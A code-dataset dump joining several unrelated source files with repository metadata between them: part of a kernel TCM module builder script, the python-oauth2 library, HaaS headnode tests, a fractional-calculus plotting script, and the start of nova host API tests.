print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
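# A minimal usage sketch (an assumption, not part of the script itself):
# main() builds tcm_dir from cwd + "/../../", so it expects to be run from a
# directory two levels below the kernel root, e.g.:
#
#   cd <kernel-tree>/drivers/target
#   python tcm_mod_builder.py -m tcm_nab5000 -p iSCSI
#
# "tcm_nab5000" is a hypothetical module name; the run emits the generated
# <name>_base.h, <name>_fabric.{c,h} and <name>_configfs.c sources plus the
# Makefile and Kconfig stubs under drivers/target/<name>/.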
|
gpl-2.0
|
bjacquemet/python-oauth2
|
oauth2/__init__.py
|
458
|
29044
|
"""
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import base64
import urllib
import time
import random
import urlparse
import hmac
import binascii
import httplib2
try:
from urlparse import parse_qs
parse_qs # placate pyflakes
except ImportError:
# fall back for Python 2.5
from cgi import parse_qs
try:
from hashlib import sha1
sha = sha1
except ImportError:
# hashlib was added in Python 2.5
import sha
import _version
__version__ = _version.__version__
OAUTH_VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
class Error(RuntimeError):
"""Generic exception class."""
def __init__(self, message='OAuth error occurred.'):
self._message = message
@property
def message(self):
"""A hack to get around the deprecation errors in 2.6."""
return self._message
def __str__(self):
return self._message
class MissingSignature(Error):
pass
def build_authenticate_header(realm=''):
"""Optional WWW-Authenticate header (401 error)"""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def build_xoauth_string(url, consumer, token=None):
"""Build an XOAUTH string for use in SMTP/IMPA authentication."""
request = Request.from_consumer_and_token(consumer, token,
"GET", url)
signing_method = SignatureMethod_HMAC_SHA1()
request.sign_request(signing_method, consumer, token)
params = []
for k, v in sorted(request.iteritems()):
if v is not None:
params.append('%s="%s"' % (k, escape(v)))
return "%s %s %s" % ("GET", url, ','.join(params))
def to_unicode(s):
""" Convert to unicode, raise exception with instructive error
message if s is not unicode, ascii, or utf-8. """
if not isinstance(s, unicode):
if not isinstance(s, str):
raise TypeError('You are required to pass either unicode or string here, not: %r (%s)' % (type(s), s))
try:
s = s.decode('utf-8')
except UnicodeDecodeError, le:
raise TypeError('You are required to pass either a unicode object or a utf-8 string here. You passed a Python string object which contained non-utf-8: %r. The UnicodeDecodeError that resulted from attempting to interpret it as utf-8 was: %s' % (s, le,))
return s
def to_utf8(s):
return to_unicode(s).encode('utf-8')
def to_unicode_if_string(s):
if isinstance(s, basestring):
return to_unicode(s)
else:
return s
def to_utf8_if_string(s):
if isinstance(s, basestring):
return to_utf8(s)
else:
return s
def to_unicode_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_unicode(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_unicode(e) for e in l ]
def to_utf8_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_utf8(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_utf8_if_string(e) for e in l ]
def escape(s):
"""Escape a URL including any /."""
return urllib.quote(s.encode('utf-8'), safe='~')
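# e.g. escape(u'a b/c') == 'a%20b%2Fc': spaces become %20 and '/' is
# percent-encoded (only letters, digits, '_.-' and '~' survive unquoted),
# matching RFC 3986 percent-encoding as used by OAuth.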
def generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def generate_nonce(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def generate_verifier(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
class Consumer(object):
"""A consumer of OAuth-protected services.
The OAuth consumer is a "third-party" service that wants to access
protected resources from an OAuth service provider on behalf of an end
user. It's kind of the OAuth client.
Usually a consumer must be registered with the service provider by the
developer of the consumer software. As part of that process, the service
provider gives the consumer a *key* and a *secret* with which the consumer
software can identify itself to the service. The consumer will include its
key in each request to identify itself, but will use its secret only when
signing requests, to prove that the request is from that particular
registered consumer.
Once registered, the consumer can then use its consumer credentials to ask
the service provider for a request token, kicking off the OAuth
authorization process.
"""
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def __str__(self):
data = {'oauth_consumer_key': self.key,
'oauth_consumer_secret': self.secret}
return urllib.urlencode(data)
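# e.g. (hypothetical credentials):
#   consumer = Consumer(key='my-app-key', secret='my-app-secret')
#   str(consumer)  # urlencoded key/secret pair (parameter order may vary)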
class Token(object):
"""An OAuth credential used to request authorization or a protected
resource.
Tokens in OAuth comprise a *key* and a *secret*. The key is included in
requests to identify the token being used, but the secret is used only in
the signature, to prove that the requester is who the server gave the
token to.
When first negotiating the authorization, the consumer asks for a *request
token* that the live user authorizes with the service provider. The
consumer then exchanges the request token for an *access token* that can
be used to access protected resources.
"""
key = None
secret = None
callback = None
callback_confirmed = None
verifier = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def set_callback(self, callback):
self.callback = callback
self.callback_confirmed = 'true'
def set_verifier(self, verifier=None):
if verifier is not None:
self.verifier = verifier
else:
self.verifier = generate_verifier()
def get_callback_url(self):
if self.callback and self.verifier:
# Append the oauth_verifier.
parts = urlparse.urlparse(self.callback)
scheme, netloc, path, params, query, fragment = parts[:6]
if query:
query = '%s&oauth_verifier=%s' % (query, self.verifier)
else:
query = 'oauth_verifier=%s' % self.verifier
return urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
return self.callback
def to_string(self):
"""Returns this token as a plain string, suitable for storage.
The resulting string includes the token's secret, so you should never
send or store this string where a third party can read it.
"""
data = {
'oauth_token': self.key,
'oauth_token_secret': self.secret,
}
if self.callback_confirmed is not None:
data['oauth_callback_confirmed'] = self.callback_confirmed
return urllib.urlencode(data)
@staticmethod
def from_string(s):
"""Deserializes a token from a string like one returned by
`to_string()`."""
if not len(s):
raise ValueError("Invalid parameter string.")
params = parse_qs(s, keep_blank_values=False)
if not len(params):
raise ValueError("Invalid parameter string.")
try:
key = params['oauth_token'][0]
except Exception:
raise ValueError("'oauth_token' not found in OAuth request.")
try:
secret = params['oauth_token_secret'][0]
except Exception:
raise ValueError("'oauth_token_secret' not found in "
"OAuth request.")
token = Token(key, secret)
try:
token.callback_confirmed = params['oauth_callback_confirmed'][0]
except KeyError:
pass # 1.0, no callback confirmed.
return token
def __str__(self):
return self.to_string()
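# A round-trip sketch: to_string()/from_string() preserve the key and secret
# (and oauth_callback_confirmed when set), but not the callback URL itself:
#
#   t = Token('req-key', 'req-secret')
#   t.set_callback('http://example.com/cb')
#   t2 = Token.from_string(t.to_string())
#   assert (t2.key, t2.secret) == ('req-key', 'req-secret')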
def setter(attr):
name = attr.__name__
def getter(self):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
def deleter(self):
del self.__dict__[name]
return property(getter, attr, deleter)
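# How `setter` is used below: decorating a method with @setter turns it into
# a property whose setter is the decorated function, with a generic getter
# and deleter backed by self.__dict__ -- see the `url` and `method`
# properties on Request.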
class Request(dict):
"""The parameters and information for an HTTP request, suitable for
authorizing with OAuth credentials.
When a consumer wants to access a service's protected resources, it does
so using a signed HTTP request identifying itself (the consumer) with its
key, and providing an access token authorized by the end user to access
those resources.
"""
version = OAUTH_VERSION
def __init__(self, method=HTTP_METHOD, url=None, parameters=None,
body='', is_form_encoded=False):
if url is not None:
self.url = to_unicode(url)
self.method = method
if parameters is not None:
for k, v in parameters.iteritems():
k = to_unicode(k)
v = to_unicode_optional_iterator(v)
self[k] = v
self.body = body
self.is_form_encoded = is_form_encoded
@setter
def url(self, value):
self.__dict__['url'] = value
if value is not None:
scheme, netloc, path, params, query, fragment = urlparse.urlparse(value)
# Exclude default port numbers.
if scheme == 'http' and netloc[-3:] == ':80':
netloc = netloc[:-3]
elif scheme == 'https' and netloc[-4:] == ':443':
netloc = netloc[:-4]
if scheme not in ('http', 'https'):
raise ValueError("Unsupported URL %s (%s)." % (value, scheme))
# Normalized URL excludes params, query, and fragment.
self.normalized_url = urlparse.urlunparse((scheme, netloc, path, None, None, None))
else:
self.normalized_url = None
self.__dict__['url'] = None
@setter
def method(self, value):
self.__dict__['method'] = value.upper()
def _get_timestamp_nonce(self):
return self['oauth_timestamp'], self['oauth_nonce']
def get_nonoauth_parameters(self):
"""Get any non-OAuth parameters."""
return dict([(k, v) for k, v in self.iteritems()
if not k.startswith('oauth_')])
def to_header(self, realm=''):
"""Serialize as a header for an HTTPAuth request."""
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth realm="%s"' % realm
if params_header:
auth_header = "%s, %s" % (auth_header, params_header)
return {'Authorization': auth_header}
def to_postdata(self):
"""Serialize as post data for a POST request."""
d = {}
for k, v in self.iteritems():
d[k.encode('utf-8')] = to_utf8_optional_iterator(v)
# tell urlencode to deal with sequence values and map them correctly
# to resulting querystring. for example self["k"] = ["v1", "v2"] will
# result in 'k=v1&k=v2' and not k=%5B%27v1%27%2C+%27v2%27%5D
return urllib.urlencode(d, True).replace('+', '%20')
def to_url(self):
"""Serialize as a URL for a GET request."""
base_url = urlparse.urlparse(self.url)
try:
query = base_url.query
except AttributeError:
# must be python <2.5
query = base_url[4]
query = parse_qs(query)
for k, v in self.items():
query.setdefault(k, []).append(v)
try:
scheme = base_url.scheme
netloc = base_url.netloc
path = base_url.path
params = base_url.params
fragment = base_url.fragment
except AttributeError:
# must be python <2.5
scheme = base_url[0]
netloc = base_url[1]
path = base_url[2]
params = base_url[3]
fragment = base_url[5]
url = (scheme, netloc, path, params,
urllib.urlencode(query, True), fragment)
return urlparse.urlunparse(url)
def get_parameter(self, parameter):
ret = self.get(parameter)
if ret is None:
raise Error('Parameter not found: %s' % parameter)
return ret
def get_normalized_parameters(self):
"""Return a string that contains the parameters that must be signed."""
items = []
for key, value in self.iteritems():
if key == 'oauth_signature':
continue
# 1.0a/9.1.1 states that kvp must be sorted by key, then by value,
# so we unpack sequence values into multiple items for sorting.
if isinstance(value, basestring):
items.append((to_utf8_if_string(key), to_utf8(value)))
else:
try:
value = list(value)
except TypeError, e:
assert 'is not iterable' in str(e)
items.append((to_utf8_if_string(key), to_utf8_if_string(value)))
else:
items.extend((to_utf8_if_string(key), to_utf8_if_string(item)) for item in value)
# Include any query string parameters from the provided URL
query = urlparse.urlparse(self.url)[4]
url_items = self._split_url_string(query).items()
url_items = [(to_utf8(k), to_utf8(v)) for k, v in url_items if k != 'oauth_signature' ]
items.extend(url_items)
items.sort()
encoded_str = urllib.urlencode(items)
# Encode signature parameters per OAuth Core 1.0 protocol
# spec draft 7, section 3.6
# (http://tools.ietf.org/html/draft-hammer-oauth-07#section-3.6)
# Spaces must be encoded with "%20" instead of "+"
return encoded_str.replace('+', '%20').replace('%7E', '~')
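# e.g. Request('GET', 'http://example.com/?q=1', {'b': '2', 'a': ['x', '1']})
# normalizes to 'a=1&a=x&b=2&q=1': sequence values are unpacked into separate
# pairs, everything is utf-8 encoded and sorted, spaces become %20 and '~'
# stays unescaped.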
def sign_request(self, signature_method, consumer, token):
"""Set the signature parameter to the result of sign."""
if not self.is_form_encoded:
# according to
# http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html
# section 4.1.1 "OAuth Consumers MUST NOT include an
# oauth_body_hash parameter on requests with form-encoded
# request bodies."
self['oauth_body_hash'] = base64.b64encode(sha(self.body).digest())
if 'oauth_consumer_key' not in self:
self['oauth_consumer_key'] = consumer.key
if token and 'oauth_token' not in self:
self['oauth_token'] = token.key
self['oauth_signature_method'] = signature_method.name
self['oauth_signature'] = signature_method.sign(self, consumer, token)
@classmethod
def make_timestamp(cls):
"""Get seconds since epoch (UTC)."""
return str(int(time.time()))
@classmethod
def make_nonce(cls):
"""Generate pseudorandom number."""
return str(random.randint(0, 100000000))
@classmethod
def from_request(cls, http_method, http_url, headers=None, parameters=None,
query_string=None):
"""Combines multiple parameter sources."""
if parameters is None:
parameters = {}
# Headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# Check that the authorization header is OAuth.
if auth_header[:6] == 'OAuth ':
auth_header = auth_header[6:]
try:
# Get the parameters from the header.
header_params = cls._split_header(auth_header)
parameters.update(header_params)
except:
raise Error('Unable to parse OAuth parameters from '
'Authorization header.')
# GET or POST query string.
if query_string:
query_params = cls._split_url_string(query_string)
parameters.update(query_params)
# URL parameters.
param_str = urlparse.urlparse(http_url)[4] # query
url_params = cls._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return cls(http_method, http_url, parameters)
return None
@classmethod
def from_consumer_and_token(cls, consumer, token=None,
http_method=HTTP_METHOD, http_url=None, parameters=None,
body='', is_form_encoded=False):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': consumer.key,
'oauth_timestamp': cls.make_timestamp(),
'oauth_nonce': cls.make_nonce(),
'oauth_version': cls.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
if token.verifier:
parameters['oauth_verifier'] = token.verifier
return Request(http_method, http_url, parameters, body=body,
is_form_encoded=is_form_encoded)
@classmethod
def from_token_and_callback(cls, token, callback=None,
http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return cls(http_method, http_url, parameters)
@staticmethod
def _split_header(header):
"""Turn Authorization: header into parameters."""
params = {}
parts = header.split(',')
for param in parts:
# Ignore realm parameter.
if param.find('realm') > -1:
continue
# Remove whitespace.
param = param.strip()
# Split key-value.
param_parts = param.split('=', 1)
# Remove quotes and unescape the value.
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
@staticmethod
def _split_url_string(param_str):
"""Turn URL string into parameters."""
parameters = parse_qs(param_str.encode('utf-8'), keep_blank_values=True)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
class Client(httplib2.Http):
"""OAuthClient is a worker to attempt to execute a request."""
def __init__(self, consumer, token=None, cache=None, timeout=None,
proxy_info=None):
if consumer is not None and not isinstance(consumer, Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, Token):
raise ValueError("Invalid token.")
self.consumer = consumer
self.token = token
self.method = SignatureMethod_HMAC_SHA1()
httplib2.Http.__init__(self, cache=cache, timeout=timeout, proxy_info=proxy_info)
def set_signature_method(self, method):
if not isinstance(method, SignatureMethod):
raise ValueError("Invalid signature method.")
self.method = method
def request(self, uri, method="GET", body='', headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS, connection_type=None):
DEFAULT_POST_CONTENT_TYPE = 'application/x-www-form-urlencoded'
if not isinstance(headers, dict):
headers = {}
if method == "POST":
headers['Content-Type'] = headers.get('Content-Type',
DEFAULT_POST_CONTENT_TYPE)
is_form_encoded = \
headers.get('Content-Type') == 'application/x-www-form-urlencoded'
if is_form_encoded and body:
parameters = parse_qs(body)
else:
parameters = None
req = Request.from_consumer_and_token(self.consumer,
token=self.token, http_method=method, http_url=uri,
parameters=parameters, body=body, is_form_encoded=is_form_encoded)
req.sign_request(self.method, self.consumer, self.token)
schema, rest = urllib.splittype(uri)
if rest.startswith('//'):
hierpart = '//'
else:
hierpart = ''
host, rest = urllib.splithost(rest)
realm = schema + ':' + hierpart + host
if is_form_encoded:
body = req.to_postdata()
elif method == "GET":
uri = req.to_url()
else:
headers.update(req.to_header(realm=realm))
return httplib2.Http.request(self, uri, method=method, body=body,
headers=headers, redirections=redirections,
connection_type=connection_type)
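# A minimal two-legged usage sketch (hypothetical endpoint and credentials):
#
#   consumer = Consumer('my-key', 'my-secret')
#   client = Client(consumer)
#   resp, content = client.request('http://example.com/api/', 'GET')
#
# Requests are signed with HMAC-SHA1 by default; call set_signature_method()
# to swap in SignatureMethod_PLAINTEXT or a custom SignatureMethod subclass.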
class Server(object):
"""A skeletal implementation of a service provider, providing protected
resources to requests from authorized consumers.
This class implements the logic to check requests for authorization. You
can use it with your web server or web framework to protect certain
resources with OAuth.
"""
timestamp_threshold = 300 # In seconds, five minutes.
version = OAUTH_VERSION
signature_methods = None
def __init__(self, signature_methods=None):
self.signature_methods = signature_methods or {}
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.name] = signature_method
return self.signature_methods
def verify_request(self, request, consumer, token):
"""Verifies an api call and checks all the parameters."""
self._check_version(request)
self._check_signature(request, consumer, token)
parameters = request.get_nonoauth_parameters()
return parameters
def build_authenticate_header(self, realm=''):
"""Optional support for the authenticate header."""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def _check_version(self, request):
"""Verify the correct version of the request for this server."""
version = self._get_version(request)
if version and version != self.version:
raise Error('OAuth version %s not supported.' % str(version))
def _get_version(self, request):
"""Return the version of the request for this server."""
try:
version = request.get_parameter('oauth_version')
except:
version = OAUTH_VERSION
return version
def _get_signature_method(self, request):
"""Figure out the signature with some defaults."""
try:
signature_method = request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# Get the signature method object.
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
raise Error('Signature method %s not supported; try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_verifier(self, request):
return request.get_parameter('oauth_verifier')
def _check_signature(self, request, consumer, token):
timestamp, nonce = request._get_timestamp_nonce()
self._check_timestamp(timestamp)
signature_method = self._get_signature_method(request)
try:
signature = request.get_parameter('oauth_signature')
except:
raise MissingSignature('Missing oauth_signature.')
# Validate the signature.
valid = signature_method.check(request, consumer, token, signature)
if not valid:
key, base = signature_method.signing_base(request, consumer, token)
raise Error('Invalid signature. Expected signature base '
'string: %s' % base)
def _check_timestamp(self, timestamp):
"""Verify that timestamp is recentish."""
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise Error('Expired timestamp: given %d and now %s has a '
'greater difference than threshold %d' % (timestamp, now,
self.timestamp_threshold))
class SignatureMethod(object):
"""A way of signing requests.
The OAuth protocol lets consumers and service providers pick a way to sign
requests. This interface shows the methods expected by the other `oauth`
modules for signing requests. Subclass it and implement its methods to
provide a new way to sign requests.
"""
def signing_base(self, request, consumer, token):
"""Calculates the string that needs to be signed.
This method returns a 2-tuple containing the starting key for the
signing and the message to be signed. The latter may be used in error
messages to help clients debug their software.
"""
raise NotImplementedError
def sign(self, request, consumer, token):
"""Returns the signature for the given request, based on the consumer
and token also provided.
You should use your implementation of `signing_base()` to build the
message to sign. Otherwise it may be less useful for debugging.
"""
raise NotImplementedError
def check(self, request, consumer, token, signature):
"""Returns whether the given signature is the correct signature for
the given consumer and token signing the given request."""
built = self.sign(request, consumer, token)
return built == signature
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HMAC-SHA1'
def signing_base(self, request, consumer, token):
if not hasattr(request, 'normalized_url') or request.normalized_url is None:
raise ValueError("Base URL for request is not set.")
sig = (
escape(request.method),
escape(request.normalized_url),
escape(request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def sign(self, request, consumer, token):
"""Builds the base signature string."""
key, raw = self.signing_base(request, consumer, token)
hashed = hmac.new(key, raw, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
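# The signature base string produced above has the form
#   escape(METHOD)&escape(normalized_url)&escape(normalized_parameters)
# and the HMAC key is 'escape(consumer_secret)&escape(token_secret)' (the
# token part is empty for two-legged requests), following OAuth Core 1.0
# section 9.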
class SignatureMethod_PLAINTEXT(SignatureMethod):
name = 'PLAINTEXT'
def signing_base(self, request, consumer, token):
"""Concatenates the consumer key and secret with the token's
secret."""
sig = '%s&' % escape(consumer.secret)
if token:
sig = sig + escape(token.secret)
return sig, sig
def sign(self, request, consumer, token):
key, raw = self.signing_base(request, consumer, token)
return raw
|
mit
|
henn/haas
|
tests/deployment/headnodes.py
|
2
|
2516
|
# Copyright 2013-2015 Massachusetts Open Cloud Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS
# IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""Unit tests for headnodes.
These require an actual libvirt daemon (and full HaaS setup), and are
somewhat particular to the MOC's development environment. They may be
difficult to run in other contexts.
"""
from haas.test_common import *
from haas.dev_support import have_dry_run
from haas import config, server, rest
import pytest
@pytest.fixture
def configure():
config_testsuite()
config.load_extensions()
fresh_database = pytest.fixture(fresh_database)
@pytest.fixture
def server_init():
server.register_drivers()
server.validate_state()
with_request_context = pytest.yield_fixture(with_request_context)
headnode_cleanup = pytest.fixture(headnode_cleanup)
pytestmark = pytest.mark.usefixtures('configure',
'server_init',
'fresh_database',
'with_request_context',
'headnode_cleanup')
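# Note: re-wrapping the imported helpers (fresh_database, headnode_cleanup,
# with_request_context) with pytest.fixture above registers them in this
# module, so the pytestmark line can apply them to every test below.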
class TestHeadNode:
def test_headnode(self):
api.project_create('anvil-nextgen')
network_create_simple('spider-web', 'anvil-nextgen')
api.headnode_create('hn-0', 'anvil-nextgen', 'base-headnode')
api.headnode_create_hnic('hn-0', 'hnic-0')
api.headnode_connect_network('hn-0', 'hnic-0', 'spider-web')
if have_dry_run():
pytest.xfail("Running in dry-run mode; can't talk to libvirt.")
assert json.loads(api.show_headnode('hn-0'))['vncport'] is None
api.headnode_start('hn-0')
assert json.loads(api.show_headnode('hn-0'))['vncport'] is not None
api.headnode_stop('hn-0')
api.headnode_delete('hn-0')
def test_headnode_deletion_while_running(self):
api.project_create('anvil-nextgen')
api.headnode_create('hn-0', 'anvil-nextgen', 'base-headnode-2')
api.headnode_start('hn-0')
api.headnode_delete('hn-0')
|
apache-2.0
|
lsiemens/lsiemens.github.io
|
theory/fractional_calculus/code/old/FCC2.py
|
1
|
1663
|
"""
Ideas about fractional calculus defined on C^2
J^b f(x, a) = f(x, a + b)
"""
import numpy
from matplotlib import pyplot
from scipy import special
def monomial(x, a, x_0, a_0):
return (x - x_0)**(a - a_0)/special.gamma(a - a_0 + 1)
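# Sketch: monomial(x, a, 0, 0) = x**a / gamma(a + 1), so stepping the order
# parameter `a` reproduces the usual integration ladder, e.g.
# monomial(x, 1, 0, 0) == x and monomial(x, 2, 0, 0) == x**2 / 2.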
def exp(x, a, b):
return b**(-a)*numpy.exp(b*x)
def projx(f, x, a):
n = numpy.searchsorted(numpy.real(a), 0.0)
pyplot.plot(x, f[-n, :])
pyplot.show()
def proja(f, x, a):
n = numpy.searchsorted(numpy.real(x), 0.0)
pyplot.plot(a, f[:, -n])
pyplot.show()
def plotR(f, vmin=-10, vmax=10):
_plot_C3(numpy.real(f), vmin=vmin, vmax=vmax)
def plotI(f, vmin=-10, vmax=10):
_plot_C3(numpy.imag(f), vmin=vmin, vmax=vmax)
def plotM(f, vmax=10):
_plot_C3(numpy.abs(f), vmax=vmax)
def plotMl(f):
_plot_C3(numpy.log(numpy.abs(f)))
def _plot_C3(f, vmin=None, vmax=None):
pyplot.imshow(f, extent = [x_0, x_1, a_0, a_1], vmin=vmin, vmax=vmax)
pyplot.show()
x_0, x_1, Nx = -5, 5, 1000
a_0, a_1, Na = -5, 5, 1000
X = numpy.linspace(x_0, x_1, Nx, dtype=numpy.complex)
dx = (x_1 - x_0)/(Nx - 1)
da = (a_1 - a_0)/(Na - 1)
A = numpy.linspace(a_0, a_1, Na, dtype=numpy.complex)
domain_x, domain_a = numpy.meshgrid(X, A[::-1])
F = monomial(domain_x, domain_a, 0, -1)
G = monomial(domain_x, domain_a, 1, -1) + monomial(domain_x, domain_a, 1, 0)
G = -monomial(domain_x, domain_a, 1, -1) + 0.5*monomial(domain_x, domain_a, 0, -3)
G = (exp(domain_x, domain_a, 1.0j) + exp(domain_x, domain_a, -1.0j))/2.0
#G = (exp(domain_x, domain_a, 2.0j) - exp(domain_x, domain_a, -2.0j))/2.0
#G = F
Gp = numpy.gradient(G)
#G = Gp[1]
projx(G, X, A)
proja(G, X, A)
plotR(G)
plotI(G)
plotM(G)
plotMl(G)
|
mit
|
fajoy/nova
|
nova/tests/api/openstack/compute/contrib/test_hosts.py
|
1
|
14601
|
# Copyright (c) 2011 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import webob.exc
from nova.api.openstack.compute.contrib import hosts as os_hosts
from nova.compute import power_state
from nova.compute import vm_states
from nova import context
from nova import db
from nova.openstack.common import log as logging
from nova import test
LOG = logging.getLogger(__name__)
HOST_LIST = {"hosts": [
{"host_name": "host_c1", "service": "compute", "zone": "nova"},
{"host_name": "host_c2", "service": "compute", "zone": "nova"}]
}
HOST_LIST_NOVA_ZONE = [
{"host_name": "host_c1", "service": "compute", "zone": "nova"},
{"host_name": "host_c2", "service": "compute", "zone": "nova"}]
SERVICES_LIST = [
{"host": "host_c1", "topic": "compute"},
{"host": "host_c2", "topic": "compute"}]
def stub_service_get_all(self, req):
return SERVICES_LIST
def stub_set_host_enabled(context, host, enabled):
if host == "notimplemented":
raise NotImplementedError()
# We'll simulate success and failure by assuming
# that 'host_c1' always succeeds, and 'host_c2'
# always fails
fail = (host == "host_c2")
status = "enabled" if (enabled != fail) else "disabled"
return status
def stub_set_host_maintenance(context, host, mode):
if host == "notimplemented":
raise NotImplementedError()
# We'll simulate success and failure by assuming
# that 'host_c1' always succeeds, and 'host_c2'
# always fails
fail = (host == "host_c2")
maintenance = "on_maintenance" if (mode != fail) else "off_maintenance"
return maintenance
def stub_host_power_action(context, host, action):
if host == "notimplemented":
raise NotImplementedError()
return action
def _create_instance(**kwargs):
"""Create a test instance"""
ctxt = context.get_admin_context()
return db.instance_create(ctxt, _create_instance_dict(**kwargs))
def _create_instance_dict(**kwargs):
"""Create a dictionary for a test instance"""
inst = {}
inst['image_ref'] = 'cedef40a-ed67-4d10-800e-17455edce175'
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = kwargs.get('user_id', 'admin')
inst['project_id'] = kwargs.get('project_id', 'fake')
inst['instance_type_id'] = '1'
if 'host' in kwargs:
inst['host'] = kwargs.get('host')
inst['vcpus'] = kwargs.get('vcpus', 1)
inst['memory_mb'] = kwargs.get('memory_mb', 20)
inst['root_gb'] = kwargs.get('root_gb', 30)
